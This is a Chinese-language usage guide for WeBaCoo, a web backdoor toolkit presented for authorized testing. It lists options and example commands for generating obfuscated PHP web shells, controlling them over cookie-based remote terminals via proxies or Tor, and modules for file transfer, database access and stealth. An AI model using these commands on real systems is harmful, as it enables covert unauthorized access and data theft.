| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \
\ /\ / __/ |/ / (| | _/\ () | (_) |
/ / __/ _,|_/_/ _/
Web Backdoor Cookie Script-Kit
作者:Anestis Bechtsoudis @ bechtsoudis.com 版权(C)2011-2012 Anestis Bechtsoudis
该工具仅用于测试目的,且只能在获得严格同意的情况下使用。请勿用于非法用途。
对本应用程序的任何修改、变更或改动都是允许的,但任何使用此代码的公开发布必须获得其创建者的批准。更多信息请查看LICENSE文件。
如果您不想为Tor代理功能安装"libio-socket-socks-perl",请注释掉webacoo.pl中的第25行。
webacoo.pl [选项]
选项: -g 生成后门代码(需要-o)
-f FUNCTION 要使用的PHP系统函数 FUNCTION 1: system (默认) 2: shell_exec 3: exec 4: passthru 5: popen
-o OUTPUT 生成的后门输出文件名
-r 返回非混淆的后门代码
-t 建立远程"终端"连接(需要-u)
-u URL 后门URL
-e CMD 单命令执行模式(需要-t和-u)
-m METHOD 使用的HTTP方法(默认为"GET")
-c C_NAME Cookie名称(默认为"M-cookie")
-d DELIM 分隔符(默认为每个请求随机生成)
-a AGENT HTTP头用户代理(默认已存在)
-p PROXY 使用代理(tor、ip:port 或 user:pass:ip:port)
-v LEVEL 详细级别 LEVEL 0: 无额外信息(默认) 1: 打印HTTP头 2: 打印HTTP头+数据
-l LOG 将活动记录到文件
-h 显示帮助并退出
update 检查更新并应用(如果有)
自0.2.1版本起,增加了扩展模块支持,以便为WeBaCoo提供额外功能。在终端模式下,您可以执行'load'来列出可用模块,并从列表中选择初始化所需的模块。输入'unload'可以恢复到初始终端模式。
可用扩展模块: o mysql-cli MySQL命令行模块 o psql-cli Postgres命令行模块 o upload 使用HTTP Post的文件上传模块 o download 通过stdout打印(借助'od'和'xxd')的文件下载模块 o stealth 通过.htaccess处理增强隐蔽性的模块
使用默认设置创建混淆后门'backdoor.php' ./webacoo.pl -g -o backdoor.php
使用'passthru'函数创建非混淆后门'raw-backdoor.php' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
使用默认设置与远程主机建立"终端"连接 ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
设置一些参数与远程主机建立"终端"连接 ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
通过本地HTTP代理与远程主机建立"终端"连接 ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
通过带基本认证的HTTP代理与远程主机建立"终端"连接 ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
通过Tor与远程主机建立"终端"连接并记录活动 ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt